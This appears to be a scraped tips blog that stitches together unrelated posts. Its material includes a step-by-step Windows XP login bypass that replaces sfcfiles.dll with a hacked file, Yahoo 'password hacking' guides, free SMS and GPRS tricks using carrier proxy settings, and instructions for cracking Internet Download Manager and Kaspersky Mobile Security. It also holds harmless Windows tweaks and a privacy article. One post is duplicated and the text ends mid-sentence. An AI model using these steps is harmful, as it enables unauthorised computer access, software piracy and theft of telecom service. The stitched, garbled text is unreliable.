==> Changing the look of Shutdonw Reason UI box Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 2200 -> 1033 ==> Changing the look of New Shutdown dialog box Open %windir%\System32\Msgina.d ll file, and goto: Dialog -> 20100 -> 1033 ==> Changing the look of Shutdown Timer box Open %windir% \System32\WinLogon.exe file, and goto: Dialog -> 1300 -> 1033 ==> Changing the look of System Properties box Open %windir%\System32\Sysdm.cpl file, and goto: Dialog -> 41 to 4103 -> 1033 ==> Changing the look of Choose Color box Open %windir% \System32\Comdlg32.dll file, and goto: Dialog -> CHOOSECOLOR -> 1033 ==> Changing the look of Choose Font box Open %windir% \System32\Comdlg32.dll file, and goto: Dialog -> 401 & 1543 -> 1033 ==> Changing the look of Printer Properties box Open %windir% \System32\Comdlg32.dll file, and goto: Dialog -> 1538 & 1539 & 1546 -> 1033 ==> Changing the look of Open/Save Dialog box Open %windir% \System32\Comdlg32.dll file, and goto: Dialog -> 1547 * 1552 -> 1033 ==> Changing the look of Many tabs in Desktop Properties box Open %windir%\System32\ThemeUI.dll file, and goto: Dialog -> 1000 to 1017 -> 1033 ==> Changing the look of Classic Programs Menu Open %windir%\Explorer.exe file, and goto: Menu -> 204 -> 1033 ==> Changing the look of Taskbar Context Menu Open %windir%\Explorer.exe file, and goto: Menu -> 205 -> 1033 ==> Changing the Start button Text Open %windir%\Explorer.exe file, and goto: String Table -> 37 -> 1033 -> 578 (For New Theme) & String Table -> 38 - > 1033 -> 595 (For Classic Theme). ==> Changing the Start Button Tool-Tip Text Open %windir%\Explorer.exe file, and goto: String Table -> 51 -> 1033 -> 800 ==> Changing the Log off, Shutdown, Search, Help & Support, Run, etc. Text entries in New Start Menu Open %windir%\Explorer.exe file, and goto: String Table -> 439 -> 1033 ==> Changing the Internet & E-Mail text in New Start Menu Open %windir%\Explorer.exe file, and goto: String Table -> 440 -> 1033 ==> Changing the All Programs text in New Start Menu Open %windir%\Explorer.exe file, and goto: String Table -> 515 -> 1033 -> 8226. ==> Changing the Connect to, Control Panel, Favorites, My Recent Documents text entries in New Start Menu Open %windir%\Explorer.exe file, and goto: String Table -> 515 -> 1033 ==> Changing the Start Button Icon Open %windir%\Explorer.exe file, and goto: Bitmap -> 143 -> 1033 ==> Changing the Side Image in Classic Start Menu Open %windir%\Explorer.exe file, and goto: Bitmap -> 167 -> 1033

Resorce hack tutorial advanced for 2014

Resource HackerTM is a freeware utility to
view, modify, rename, add, delete and
extract resources in 32bit & 64bit
Windows executables and resource files
(*.res). It incorporates an internal
resource script compiler and decompiler
and works on all (Win95 - Win7) Windows
operating systems.
Viewing Resources: Cursor, Icon, Bitmap,
GIF, AVI, and JPG resource images can
be viewed. WAV and MIDI audio
resources can be played. Menus, Dialogs,
MessageTables, StringTables,
Accelerators, Delphi Forms, and
VersionInfo resources can be viewed as
decompiled resource scripts. Menus and
Dialogs can also be viewed as they would
appear in a running application.
Saving Resources: Resources can be
saved as image files (*.ico, *.bmp etc), as
script files (*.rc), as binary resource files
(*.res), or as untyped binary files (*.bin).
Modifying Resources: Resources can be
modified by replacing the resource with a
resource located in another file (*.ico,
*.bmp, *.res etc) or by using the internal
resource script compiler (for menus,
dialogs etc). Dialog controls can also be
visually moved and/or resized by clicking
and dragging the respective dialog
controls prior to recompiling with the
internal compiler.
Adding Resources: Resources can be
added to an application by copying them
from external resource files (*.res).
Deleting Resources: Most compilers add
resources into applications which are
never used by the application. Removing
unused resources can reduce an
application's size.
Last Updated:
16 September 2011
Version: 3.6.0
Author & Copyright:
Angus Johnson
© Copyright 1999-2011
Licence to Use - Terms and Conditions:
This Resource HackerTM software is
released as freeware provided that you
agree to the following terms and
conditions:
1. This software is not to be distributed via
any website domain or any other media
without the prior written approval of the
copyright owner.
2. This software is not to be used in any
way to illegally modify software.
DISCLAIMER: A user of this Resource
Hacker TM software acknowledges that he
or she is receiving this software on an "as
is" basis and the user is not relying on
the accuracy or functionality of the
software for any purpose. The user
further acknowledges that any use of this
software will be at the user's own risk
and the copyright owner accepts no
responsibility whatsoever arising from the
use or application of the software.
The above licence terms constitute
"copyright management information"
within the meaning of Section 1202 of
Title 17 of the United States Code and
must not be altered or removed from the
licensed works. Their alteration or
removal from the licensed works, and the
distribution of licensed works without all
the above licence terms in an unaltered
way, may contravene Section 1202 and
give rise civil and/or criminal
consequences.
Resource Hacker is no longer being
developed:
I have been overwhelmed by the interest
in Resource HackerTM , the emails of
thanks, encouragement and suggestions.
It's been downloaded many millions of
times. However, I've moved on to other
things and have no plans to continue its
development. Please don't ask for the
source code, I'm not releasing it, nor is it
for sale. Colin Wilson has written an open
source Resource Editor which may
interest those looking for source code.
Otherwise, Anders Melander has also
created another excellent Resource Editor
which is still being developed.
Known Limitations:
Limitation:
Resource HackerTM was compiled using
Delphi 3.02. When decompiling and
recompiling Borland's Delphi forms in
applications compiled with later version
of Delphi, there may be errors in the
recompiled forms if frames have been
used to create the form. This error is due
to new language syntax not being
recognized.
Status:
I have no plans to recompile Resource
Hacker TM using a newer version of
Delphi.
Limitation:
To reduce the size of application files,
some applications are "packed" or
"compressed" using an EXE compressor
once they have been compiled. This has a
side-effect of making it more difficult to
view and modify resources. When a
"compressed" executable is viewed with
Resource HackerTM, only resource types
and names will be visible but not the
actual resources.
Status:
This is not viewed as a bug. The
application developer may well have
viewed this as beneficial feature so no
"fix" is planned.

Yahoo account attack windowos ,7 ,8 xp

First of all, get a Yahoo mail password cracker: Wondershare WinSuite 2012, is a trustworthy program that can help to crack Yahoo mail password in 3 steps with no hassle. 90 Days Money Back Guarantee Now, follow the steps below to do what you need. Step1. Run Yahoo password cracker After running the Yahoo password hacker, go to the "Password & Key Finder" on the top menu. Then click the "Password Finder" button in the window to continue. Step2. Select Yahoo mail/messenger password Select "Yahoo! Mail/Yahoo! Messenger Password" and click "Next" to crack your Yahoo mail password now. Step3. Hack Yahoo mail password Now you can hack Yahoo password according to the guide in the window below. Note: It's illegal to recover others' Yahoo passwords without permission. This tool is designed to recover only the user's accounts when necessary. What's more, this program also allows you to recover passwords for your MSN, Hotmail, Gmail, Outlook, etc.

Yahoo mail attack

Hack Yahoo Mail???
Forgot Password!?
I forgot my yahoo mail password, & I
cant do the "Help" things because i put a
fake secret question & birthday, & email. I
have important emails and want to get
them back. What should I do? Please
help!
As an important email account, all of us
should be serious with it, no fake security
answer and alternative email address, or
you'll regret someday. Well, when the
disaster happens, you have to fix it. If
there are only one or two vital emails you
want back and don't want to use the
email anymore, you can ask the
addressers to send you those emails
again, if it's possible. Also, this is the
most economical way.
If there are lots of important emails from
different people, even important
customers, you'd better find a way to get
your password back. It's not so hard to
do it, so keep your shirt on. With a Yahoo
password cracker, you can get back your
lost password in 3 minutes.

Yahoo account attacking trick

For plenty of Yahoo users,
forgetting passwords for their own
Yahoo accounts has been
increasingly common. Being not
able to access to Yahoo account, is
really a nightmare. So, is there any
chance to hack Yahoo password?
It is possible to hack Yahoo
password.
Yes! As a matter of fact it’s possible
to hack your forgotten Yahoo, Gmail
or MSN and other types of Email
password. That’s why some
password recovery tools come in
handy. However, I have to note here
that not every time you can use
these methods or tools to hack your
forgotten password successfully. It
is only when the web browsers on
your PC like IE, Firefox, Opera, etc.
have stored your Yahoo login
information, then yahoo password
hack comes possible.
Practical and easy ways to hack
Yahoo password
Method1: Hack Yahoo password
through alternate Email.
1. Go to the Yahoo Sign-in
Problems page.
2. Provides the following
information: Your Yahoo ID,
Alternate email address,
mobile phone number, or
the answers to your secret
questions
3. Then A Reset Your
Password Link will be sent
to your alternate email
address.
4. Click the link and enter
your new password in the
Reset your password page.
Note: If you forgot any one of login
information like alternate email
address, answers to your secret
questions etc. then you cannot hack
your forgotten Yahoo password in
this way. But never mind, you still
have the last resort, then move to
Method2.
Method2: Hack Yahoo email
password with Firefox Password
Recovery
Firefox is a widely used browser,
which can save the passwords of
websites or Email accounts you’ve
ever visited. We Yahoo users also
won’t miss such a convenience.
However, once we clear the cookie
or history of Firefox or we just need
to login to Yahoo on another
computer, we may encounter Yahoo
password forgotten problem. In
these cases, Firefox Password
Recovery can help you instantly fix
the problem. Below are the specific
steps on how to hack Yahoo Email
password with this tool.
Step1: Download, install and run
SmartKey Firefox Password
Recovery to your PC.
Step2: Click “Start Recovery”, then
in the drop-down list you just
choose “Recover Firefox Password”.
Step3: Within seconds, all of the
login information including your
Yahoo accounts and passwords
stored in Firefox will be displayed
automatically.
After the recovery process is done,
you’d better write down your Yahoo
accounts with their passwords
together, so that next time you
won’t forget them again.

Attack Windows XP Computer Without Changing Password with cool codes

Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords. There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorization. Steps to Hack into a Windows XP Computer without changing password: 1. Get physical access to the machine. Remember that it must have a CD or DVD drive. 2.Download this archive file (Size: 4.5 Mb). 3. Unzip the downloaded PCHaCKs- DreamPack.zip and you’ll get dpl.ISO . 4. Use any burning program that can burn ISO images like UltraISO, PowerISO or Nero. 5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files. 6. Press “R” to install DreamPackPL. 7. Press “C” to install DreamPackPL by using the recovery console. 8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed) 9. Backup your original sfcfiles.dll by typing: “ ren C:\Windows \System32\sfcfiles.dll sfcfiles.lld ” (without quotes) 10. Copy the hacked file from CD to system32 folder. Type: “ copy D:\i386\pinball.ex_ C: \Windows \System32\sfcfiles.dll ” (without quotes and assuming your CD drive is D:) 11. Type “ exit”, take out disk and reboot. 12. In the password field, type “ dreamon” (without quotes) and DreamPack menu will appear. 13. Click the top graphic on the DreamPack menu and you will get a menu popup. 14. Go to commands and enable the options and enable the god command. 15. Type “ god ” in the password field to get in Windows. You can also go to Passwords and select “ Logon with wrong password and hash”. This option allows you to login with ANY password. Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labeled this tool as a Hack-Tool . A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

Speed up your XP and Vista by hack its system registry 2013

Do you know that your computer is
like your car: it needs periodic
maintenance to keep it running at
optimum performance. Installing
and un-installing programs, surfing
the Internet, emailing, and other
everyday activities create a sort of
“sludge” that builds up in your
computer over time, much like an
automobile engine. After a while, it
doesn't startup like when it was
new, it stalls unexpectedly, and
performance is sluggish on the
(information) highway.
Of course, the fastest and easiest
way to speed-up your computer is to
allow a software program to do it
for you! Although you will find that
all of the adjustments in this book
will speed up your system, the most
effective and easiest way to give
your computer blazing speed is to
clean up your system’s Registry.
We strongly recommend running a
free Registry scan to find out how
many errors you computer is hiding
from you. Your computer will likely
have hundreds of Registry errors
that are dramatically slowing down
the potential speed and
performance.
Or you can try the shareware of
these registry cleaner programs,
such as System Cleaner, Registry
First Aid , RegSeeker or TuneUp
Utilities 2009 for tune up your
Windows XP and/or Vista.

Keep Protect Your FaceBook and Twitter Privacy

Surfing the web no longer a solo
activity. Facebook , Twitter , and
other social networks have quickly
become an integral part of the online
culture, and with them comes an
array of serious threats to your
privacy. In this article, I’ll identify
some of the key dangers of social
networking and offer a few easy
steps that you can take to stay safe
online. Social networking is built on
the idea of sharing information
openly and fostering a sense of
community. Unfortunately, an online
network of individuals who actively
share their experiences and seek
connections with other like-minded
people can be easy prey for hackers
engaged in social engineering and
phishing attacks. It’s important to
be aware of the threats and to use
discretion in all of your online
interactions.
Take
Care
Before
You
Share
Online
For
starters,
even in
an open
community of sharing, you should
observe commonsense boundaries.
As President Obama warned
students in his September address
to schools, “be careful what you
post on Facebook . Whatever you do,
it will be pulled up again later
somewhere in your life.” The core
truth of that statement can be
applied to any social networking
site, and possibly to the Internet as
a whole. As a general rule, refrain
from posting things online that you
will regret later. The odds are good
that someone, someday, will
stumble across it, and it may come
back to haunt you— especially if you
are planning to run for public office.
If you think that abstaining from
posting embarrassing or
inflammatory comments online ruins
the fun, you’re playing a dangerous
game. Remember who your friends
are, and know that a friend of a
friend can be an enemy.
Don’t Lose Sight of Who Your
Friends Are
When you write a Twitter tweet or
post a Facebook status update, you
have to keep your audience in mind.
More and more these days, we hear
stories about people who forgot that
their boss was part of their network
and then said things online that
resulted in their being reprimanded
or even fired. The adverse
consequences of posting
inappropriate on line comments
have become so commonplace—at
least anecdotally—that they have
earned an entry in the Urban
Dictionary: Facebook fired . Even
announcing something as seemingly
innocuous as “I’m bored” in a
status up - date during work hours
can have dire consequences if the
wrong people see it. With services
like Twitter, and with the recent
changes to Facebook that permit
any interested party to view and
search your updates, you really have
no way to hide.
Recognize the Visibility of Your
Posts
You’ve thought it through, and you
want to shout to the world how you
feel about having to work overtime
and during a weekend that you had
earmarked for recreational activities.
You have checked and double
checked, and you’ve determined that
your boss is not in your network, so
you let loose on the keyboard and
speak your mind. Unfortunately,
you’re not home free (figuratively
speaking) just yet. Being outside of
your network, your boss can’t see
your post directly, but if a Facebook
friend who is connected with your
boss comments on your status
update—even just to say “I
sympathize”— your boss may be
able to click on the link through the
friend and see your post. Go ahead,
be social. Share your trials and
tribulations with your growing
network of adoring followers. But
for your own safety, keep one
essential rule in mind: Never post
anything online that you wouldn’t be
comfortable having everyone you
know see—because eventually they
probably will see it.
Define the Parameters of Your
Privacy
Marrying privacy and social
networking may seem terribly
unintuitive. How can you be social
and open, and yet protect your
privacy? Well, just because you are
choosing to share some information
with a select group of people does
not necessarily mean that you want
to share everything with everyone, or
that you are indifferent about
whether the information you share is
visible to all. Facebook, in
particular, has drawn unwanted
attention in connection with various
privacy concerns. If you have used
Facebook for a while, you may have
noticed advertisements that
incorporate your friends’ names or
photos associated with them.
Facebook does provide privacy
controls for you to customize the
types of information available to
thirdparty applications. If you look
at the Facebook Ads tab of the
privacy controls, though, you’ll
notice that it doesn’t give you any
way to opt out of the internal
Facebook Ads. Instead, it states
(alarmingly) that “Facebook strives
to create relevant and interesting
advertisements to you and your
friends.”
Approach Tattletale Quizzes With
Caution
For many users, one of the primary
attractions of Facebook is the
virtually endless selection of games
and quizzes. And part of their allure
is their social aspect. In the
advergames, you compete against
your friends; through the quizzes,
you learn more about them while
being briefl y entertained. The ACLU
exposed problems with how much
information these quizzes and
games share, however. Typically,
when a Facebook user initiates a
game or quiz, a notice pops up to
declare that interacting with the
application requires opening access
to information; the notice also
provides the user the opportunity to
opt out and cancel, or to allow the
access to continue. The permission
page clearly informs the user up
front that allowing “access will let
[the application] pull your profile
information, photos, your friends’
info, and other content that it
requires to work.” Under the
circumstances, you may wonder (as
the ACLU has) why a game or quiz
application would “require” access
to your friends’ information in order
to work.
Facebook Policy Concerns in
Canada
Facebook’s privacy policies have
run afoul of the Canadian
government, too. Canada’s Privacy
Commissioner has determined that
those policies and practices violate
Canadian privacy regulations, and
has recommended various changes
Facebook should make to comply
with them. One of the
commissioner’s biggest concerns
involves the permanence of
accounts and account data.
Facebook offers users a way to
disable or deactivate an account,
but it doesn’t seem to provide a
method for completely deleting an
account. Photos and status updates
might be available long after a user
has shut down a Facebook profile.
And like the ACLU, the Canadian
government is unhappy about the
amount of user information that
Facebook shares with thirdparty
application providers.
Exercise the Privacy Controls You
Have
Although the concerns of the ACLU
and the Canadian government run a
little deeper, Facebook does offer
privacy controls for restricting or
denying access to information. Since
Facebook is a social networking site
designed for sharing information,
many of the settings are open by
default. It is up to you to access the
Privacy Settings and configure the
options as you see fit. For each
available setting, you can choose to
share information with Everyone,
with My Networks and Friends, with
Friends of Friends, or with Only
Friends; if you prefer, you can
customize the settings to finetune
access further.
Beware of Hijacking and Phishing
Scams
By its very nature, social networking
is all about socializing, which
means that users are more than
usually disposed to let their guard
down and share information. They
come to the network to expand their
professional connections,
reestablish contact with old friends,
and communicate in real time with
pals and peers. And for predatory
bad guys, launching social-
engineering and phishing attacks in
this convivial environment is like
shooting fish in a barrel. Most
people know not to respond to e-
mail requests from exiled Nigerian
royalty promising millions of dollars
in return for help smuggling the
money out of the country. (Anyone
who doesn’t know better probably
shouldn’t be on the Internet; such
people are a danger to themselves
and to others.) But what if a good
friend from high school whom you
haven’t seen in 18 years sends you
a message on Facebook explaining
how her wallet was stolen and her
car broke down, and asks you to
wire money to help her get home?
You might be less suspicious than
you should be. Attackers have
figured out that family and friends
are easy prey for sob stories of this
type. Using other attacks or
methods, they gain access to a
Facebook account and hijack it.
They change the password so that
the legitimate owner can’t get back
in, and then they proceed to reach
out to the friends of the hijacked
account and attempt to extort
money such a Facebook message or
e-mail plea, pick up the phone and
call the person directly to confirm its
legitimacy.
Don’t Let a Tiny URL Fool You
Another threat that has emerged
recently as a result of social
networking is the tiny-URL attack.
Some URLs are very long and don’t
work well in e-mail or in blog posts,
creating a need for URLshortening
services. In particular, Twitter, with
its 140-character limit, has made
the use of URL shortening services
such as Bit.ly a virtual necessity.
Unfortunately, attackers can exploit
a shortened URL to lure users into
accessing malicious Web sites.
Since the shortened URL consists of
a random collection of characters
that are unrelated to the actual URL,
users cannot easily determine
whether it is legitimate or phony.
TweetDeck, a very popular
application for sending messages in
Twitter, provides a ‘Show preview
information for short URLs’ option,
which offers some protection.
The preview window supplies details
about the shortened URL, including
the actual long URL that the link
leads to. If you aren’t using
TweetDeck for Twitter, or if you need
to deal with shortened URLs on
other sites and services, maintain a
healthy dose of skepticism about
what might lie behind the
obfuscated address that a message
points to.

Idea free sms tricks

Now a days SMS center numbers are almost not working.
But still there is tricks to sent free sms to idea-idea and idea
to other network .
Just try this trick :-
1 Make your account to 0
2 Sent an sms to any number with amount 0
3 you will get an error message as “Check operator service”.
4 Now recharge your account with rs 15 (20 rupees recharge
card).
5 Now set your message center number to +91xxxxxxxxxx
(xxxxxxxxxx any 10 numbers)
6 Don’t use any message center numbers there ( you may use
your own phone number)
7 Now try sent a local SMS ( If not working you will not loss
much money if sent a local sms)
8 If working you can continue using this trick
That's it

Idea free sms tricks

Now a days SMS center numbers are almost not working.
But still there is tricks to sent free sms to idea-idea and idea
to other network .
Just try this trick :-
1 Make your account to 0
2 Sent an sms to any number with amount 0
3 you will get an error message as “Check operator service”.
4 Now recharge your account with rs 15 (20 rupees recharge
card).
5 Now set your message center number to +91xxxxxxxxxx
(xxxxxxxxxx any 10 numbers)
6 Don’t use any message center numbers there ( you may use
your own phone number)
7 Now try sent a local SMS ( If not working you will not loss
much money if sent a local sms)
8 If working you can continue using this trick

Ideal sms tricks sent unlimuted without any rests

I found everyone Searching for Free SMS Tricks on the No. one Search Giant, but everyone gets what is not expected and some old stuffs. Even I Tried Searcing Free Idea SMS Tricks and all and just Ended up with nothing. Its really very difficult to Find a Free SMS Center because these centers are loop holes easily detectable by your operator. So Lets Try the Idea way. Yes Idea ! Get Idea Yes Prepaid Only. And Now its my Dimaag ka Idea to make your operator shiver and get you great SMS and Calling Offers. Yes Free SMS Credits, Bonus Talktime, Free Idea to Idea Calls, Free Callertunes and much more you can get from your Idea Connection using my Idea. MY IDEA ! Yes Mine Just SMS as Follow PORT <10 digit Idea Mobile No> to 1900 Within 24-48 hours you will get a call from Idea Care asking Your Feedback and knowing your importance as a valuable Customer will Try to convince to stay with them. Just Dont get down, Just Say that Iam Shifting to an operator who gives cheaper call and SMS rates. Now the Person will place a no. of offers for You. For me it was 6000 Local and National SMS for 90 days. I Enjoyed my 6000 Free SMS Credit. For my friend thay made his call Rate as 1p/2seconds and Idea to Idea Calling at 10p/minute. Wow They make us Feel the Words "CUSTOMER IS KING"

Airtel free gprs proxy advanced for 2014

Trick 1: (Updated on 2
September 2012):
Hi Friends, her is latest another
working proxy for Airtel, This trick is
based on tadkalive proxy which was
working in past and now working
once again, try and enjoy airtel free
gprs proxy trick September 2012.
Create new settings or change
settings as mentioned below:-
Apn: airtelgprs.com
Proxy: TADKALIVE.COM
OR
YOUTUBE .COM PORT: 80
HOMEPAGE: 203.115.112.5 or any
other working in your state.
Trick:2 (Updated: 16/07/2012)
Apn: airtelgprs.com
Proxy:
whatwill.info
or
watchppv.info
or
connect99.com
or
yogawiki.in
or
royaltyfreeimagesstock.in
Port: 80
Homepage: http://203.115.112.5 or
http://203.200.118.92 for more
homepage check trick 2 below;
Save The Settings and Enjoy free
airtel gprs proxy trick in mobile and
in PC.
Trick 3:
Here in this second airtel free gprs
proxy trick I am updating lot of
working free homepages to enjoy
unlimited Airtel Free 3G internet
downloading and surfing tricks:
Just follow our procedure:
Apn: airtelgprs.com
Proxy: 68.169.45.129
OR
72.9.152.75
Port: 80
Homepage:
202.46.201.112
203.115.112.5
203.115.112.27
203.115.112.27
122.170.122.201
122.170.122.212
122.170.122.202
122.170.122.214
121.241.248.6:8080
Note:
to avoid sim blocking:
Please, don’t download more than
50MB continuously , otherwise you
may be blocked by airtel to use free
airtel gprs tricks. So we
recommend, pause around 45 MB,
disconnect and reconnect and then
resume download.
Trick 3:
Trick to avoid sim blocking and
surfing unlimitedly in mobile with
UC and Opera:
Use our this trick to Avoid Block.
1) FOR OPERA MINI
MAKE SETTING
APN: airtelgprs.com
PORT: 80
PROXY: 141.000.011.253
NOW OPEN Opera MINI HANDLER
MENU and PUT
PROXY TYPE: HTTP
PROXY:
202.46.201.112
203.115.112.5
2) For UCWEB HANDLER
MAKE NEW SETTING IN UR MOBILE
WITH
APN: AIRTELGPRS.COM
IP: 173.254.204.80
PORT: 80
NOW OPEN UWEB HANDLER MENU
N PUT
PROXY TYPE: HTTP
PROXY:
202.46.201.112
visit our handler app section to
download Opera Mini and UC web
for airtel free gprs proxy trick.
Enjoy !!!
Be our fan On facebook If It Works
For You…

Airtel settings for free gprs highspeed settings by airtel telecop limited

Hello guys I am back with again new
frontquery..
Just create below settings and enjoy
Apn:-airtelgprs.com
Proxy :-50.22.79.99
port :-80
homepage:- d.airtelworld.com or any
working hp
Front Qiery - Freeip/~anonycgi/nph-
andripzf.cgi/20/http/
Check And Reply..!!!!!

Airtel gprs tricks works in pc

STEP 1.First of all download Duck Vpn
and download in pc
STEP 2.Install Duck-1 Vpn in your pc
STEP 3.Now signup your account on
Duck.net
STEP 4.After signup in duck.net you got
username and password in your
email account
STEP 5.Please make sure you to put
your own valid email for getting
username and password
STEP 6.Now enter your username and
password in install VPN in your
pc
STEP 7.Open Vpn setting and find port
option in install Vpn
STEP 8.In port Select Port Remote as
443,and in main select demo
golden server
STEP 9.Set Protocol as TCP and wait
for some time to connect
Note-The only drawback of this trick is
that you can download only 100mb by
this trick.If you want to
download unlimited then signup by
paying some money to duck VPN.This
deal is not so bad,you only
some money and get unlimited airtel 3G
speed.If you don't want to pay then
after finishing 100mb
make new account in duck-vpn and get
100mb more but please use different
email address.
Enjoy Guys! and don't forget to post
your comments. ©

Monday 28 January 2013

Display Legal Notice on Startup of your Windows.

If your PC has multiple users then you
can now display legal notice to every
user before they login to your PC. This
legal notice will be displayed at every
startup just before the Desktop is
loaded. Using this you can tell your
friends about the do’s and dont’s in your
computer when they login in your
absence. Well you can do this pretty
easily. For this there is one small
registry hack. Here is the step-by-step
instruction to do this.
1. Go to Start->Run, type regedit and hit
ENTER
2. Navigate to the following key in the
registry
HKEY_LOCAL_MACHINE\SOFTWARE
\Microsoft\Windows\CurrentVersion
\policies\system
On the right side pane look for
“ legalnoticecaption “, double click on it
and enter the desired Legal Notice
Caption.
3. Next below this look for
“ legalnoticetext” and enter the desired
Legal Notice Text. The legal notice text
can be up to a page in it’s size so that it
can include a set of do’s and dont’s for
your computer.
4. After you do this just restart your
computer and upon the next startup you
can see the legal notice information for
your computer. This trick works on both
XP and Vista. You can also try it on
Windows 7 and should work with no
problems.

DOWNLOAD IDM 6.07 FREE INCLUDE CRACK, KEYGEN, PATCH INTERNET DOWNLOAD MANAGER IDM 6.07 + CRACK

Internet Download Manager (IDM) is a
tool used to increase download the
speeds by up to 5 times, resume and
schedule downloads. Comprehensive
error recovery and resume capability
will restart broken or interrupted
downloads due to lost connections,
network problems, computershutdowns,
or unexpected power outages. Simple
graphic user interface makes IDM user
friendly and easy to use.
Version 6.07 adds IDM download panel
for web-players that can be used to
download flash videos from sites like
YouTube, MySpaceTV, and Google
Videos. It also features complete
Windows 7 and Vista support, YouTube
grabber, redeveloped scheduler, and
MMS protocol support. The new version
also adds improved integration for IE
and IE based browsers, redesigned and
enhanced download engine, the unique
advanced integration into all latest
browsers, improved toolbar, and a
wealth of other improvements and new
features.
How to Crack the Internet Download
Manager
First download IDM
from here
Now download the patch
and serial no. from here
Now install IDM (don't
run ) it
run the patch+keygen .
locate the idm.exe it is
generally found on C
drive > program files >
internet download
manager > idm.exe. now
click on patch . it will
give u a serial key enter
this key on idm
If it says your 30 days
trial is over .Now idm is
existing................
Don't worry run another
patch (black rider) and
locate idm.exe. it will
bypass that error  and
now you can use your
idm forever and ever
Enjoy

KASPERSKY MOBILE SECURITY 9.0 CRACKED

Kaspersky Mobile Security 9.0" is one
the best and most popular Mobile
security software at present. Along with
Mobile Antivirus it has many great
features such as call filter and sms filter
to boost up your smart phone. But all
the people can't afford to buy Full
Activation Key. So here is the
"Kaspersky Mobile Security 9.0
Cracked" Serial Full Activation key. So
just Download KMS 9.0 Full version and
secure your mobile and don't forget us
to follow on twitter
Kaspersky Mobile Security 9.0 Cracked
(Serial) – Full Activation Key
Kaspersky Mobile Security 9.0 Includes
These components: -
Anti-virus
Anti-Spyware
Anti-Thief
Mobile Web Firewall
Lock With Encryption
Great Parental
Controls
Privacy Protection
On
Filter Out Spam
SMS / Calls
And Many More
Features
Kaspersky Mobile Security 9.0 Cracked
– How The Shit Works
Download Kaspersky
Mobile Security 9.0 –
Full Activation Key &
Password: -bcoders
Run KMS 9.0
downloaded file & Exit it.
Install Runtime 9 from
downloaded file.
Install KMS Unlocker 9
from downloaded file.
Install KPatch 9 from
downloaded file.
Now RUN KPatch from
downloaded file.
Done, Now Your KMS
9.0 is fullversion for
lifetime.
So friends I hope you enjoyed this article
on Kaspersky Mobile Security 9.0 and if
you have any Problem while
downloading Kaspersky Mobile Security
9.0 Cracked then please do comment
and share your problem, I am here to
help you. Please drop comment if you
liked this.

Airtel message tricks free advanced for 2014

Airtel sms trick, send 100 free sms just
for 3 rs.
This is not a free sms trick. But for heavy
messagers this is almost like free sms.
Actually this is an offer from airtel itself
and any one can activate this trick by
simply sending an ussd code. This is a
free sms pack from airtel which is really
very cheap. It costs just 3 rs for 100 sms
per day. Doesn’t it sound cool. There is
no question about this trick works or not
as it is an active offer from airtel. We are
posting it here because many of the airtel
users are unaware of this trick. There is
no daily rental to activate this plan. There
is a one time charge for three months.
The pack costs 5 rs for 6 moths. Once
you activate this free sms pack first three
sms of each day will be charged at rs 3
per each sms message you send. and
after that you can send free 100 sms
messages to anywhere in India. So this
plan gives free benefits for airtel
subscribers who use sms heavily. And the
very best thing is that both local and
national message are free.
How to activate airtel free sms pack.
Follow the instructions shown below to
activate free sms pack on airtel. You will
be charged one time rs for 3 months and
your first three sms will be charged too.
dial *555*5#
you will get the confirmation message for
activating free daily sms pack from airtel
5rs will be deducted from your balance
and the pack is active for 180 days.
first 3 sms will be charged at rs 1 if its
local and rs1.50 if its national
every local and national sms from theron
till the midnight will be free until you ouch
the 100 sms mark
So that was all about the free sms offer
from airtel. We bet most of the airtel
subscribers didnt knew about this trick.
So if you found this helpful please do
share it with your friends. If you know
similar tricks you can post it in the
comments section. If you have any
doubts or questions regarding the free
sms offer explained here please leave a
comment. Stay subscribed with us for
more free tricks on airtel and other
networks. Thanks for reading.

Docomo free message tricks advanced for 2014

Hi Freinds,
I Hope You Daily Visit My Website For
New Tricks.:br? Tata Docomo Free SMS
Trick Just Follow Below Steps:-
Step 1 : Send Sms ‘ JOIN ’ Send to 121
( you will get three confirmation message)
Confirmation SMS 1 :-
“Enjoy access to FACEBOOK, ORKUT,
TWITTER, LINKEDIN & NIMBUZZ on
BuddyNet from midnight@2p/10kb”
you will get this as first confirmation.
Confirmation SMS 2:-
'Invite your friends with one time 50 free
SMS to join BuddyNet.
Enjoy best calling rates within BuddyNet .
To unsubscribe, SMS ' QUIT ' to 121 .
Confirmation SMS 3:- 'Thanks
forsubscribing to BuddyNet.
Enjoy Local calls at 1p/6sec and STD
at1p/2sec within BuddyNet at a daily rent
of only 60 paisa'
Step 2 :- Then in second step you have to
SMS ‘ QUIT ’ to 121
(you recieve confirmation message)
Step 3 : Check your balance Sms ‘ BAL ’
Send to 121 .
You will be surprised to see that your
local/national balance is
50 SMS And SMS Validity Is One Weak.

Docomo free gprs vpn for android users and others now enjoy 3g speed

Here Tricksme.in Brings Two New Tata
Docomo 3G UDP Trick and TCP based
Tricks for tata Docomo. which is
working and confirmed in Many States
like UP West and Southern States,
however we can’t assure 100% working
Status of this Tricks as it is also Not
Working in Many States, User’s are only
Using our Vodafone Tricks as it working
almost All Over India, but sadly
Vodafone is only working with TCP
which has slow Speed as compared
with UDP, SO More Speed Lovers should
try this Tata Docomo 3G UDP Trick
which is much easy to use if read and
understand the instructions Properly.
Here we have two Tricks for tata
Docomo< Remember Not All user’s will
be able to take benefit of it , as on 1st
Trick it requires new tata Docomo 3G
Dongle’ Sim card, and on second trick
you Will have to Recharge your number
for Rs.250. hence if you are ready to do
this All Then Go Ahead, and See its
Features
Based on UDP Ports
Two Wonderrful method
99% Working.
Confirmed working in
UP East
UDP protocol have
much fast Speed
compared with TCP
No Disconnection
problem like TCP VPN,s
Finally No balance
Deduction
Working in 2G and 3G
Both
Super fast Browsing
and Download Speed in
3G Network
Much better option than
Vodafone TCP Tricks
As Said Above there are Two methods to
Use 3G for Free. Lets see the 1st
Method.
Trick: 1
For this First method you need to Buy a
new tata Docomo 3G DataCard (dongle)
and with it you get a tatadocomo 3G
Sim card for Dongle,
